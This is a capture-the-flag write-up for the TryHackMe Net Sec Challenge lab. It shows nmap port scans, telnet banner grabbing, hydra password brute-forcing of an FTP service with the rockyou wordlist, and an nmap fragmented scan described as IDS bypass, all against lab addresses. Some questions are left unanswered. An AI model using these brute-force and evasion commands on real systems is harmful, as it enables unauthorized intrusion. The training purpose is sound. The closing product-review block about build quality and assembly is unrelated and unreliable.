TryHackMe Net Sec Challenge Writeup

Practice the skills you have learned in the Net Sec Challenge room. Learn how to use nmap and hydra and how to grab banners with Telnet.

NetSecMod Room 09 Challenge: TryHackMe Net Sec Challenge

Difficulty: Medium

Net Sec Challenge

Net Sec Challenge Writeup

Task 1 Introduction

Net Sec Challenge Writeup

Use this challenge to test your mastery of the skills you have acquired in the Network Security module. All the questions in this challenge can be solved using only nmap, telnet, and hydra.

Task 2 Challenge Questions

You can answer the following questions using Nmap, Telnet, and Hydra.

Working with Nmap

Execute nmap to scan all ports:

nmap -p- 10.10.230.119

What is the highest port number being open less than 10,000?

Answer: 8080

There is an open port outside the common 1000 ports; it is above 10,000. What is it?

Answer: 10021

How many TCP ports are open?

What is the flag hidden in the HTTP server header?

telnet 10.10.49.54 80

Trigger a HTTP GET request to our webserver

GET / HTTP\1.1
Host:localhost

What is the flag hidden in the SSH server header?

telnet 10.10.49.54 22

We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

Working with Hydra

We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?

To complete this challenge use hydra to brute force the FTP service running on port 10021

hydra -l eddie -P /usr/share/wordlists/rockyou.txt ftp://10.10.230.119:10021
hydra -l quinn -P /usr/share/wordlists/rockyou.txt ftp://10.10.230.119:10021

Nmap IDS Bypass

Browsing to http://MACHINE_IP:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

nmap 10.10.49.54 -f -sN

Task 3 Summary

Congratulations. In this module, we have learned about passive reconnaissance, active reconnaissance, Nmap, protocols and services, and attacking logins with Hydra.

THM – Net Sec Challenge

7.3 out of 10
$0

Practice the skills you have learned in the Net Sec Challenge room. Learn how to use nmap and hydra and how to grab banners with Telnet. At the end understand how scan a host using nmap and bypass IDSs.

Stability
9/10
Ease of Use
4/10
Look & Feel
9/10
Price
7/10

Pros

Easy to use

Good price

Sturdy build and ergonomics

Cons

Incompatible with old versions

Hard to assemble

Bad color combination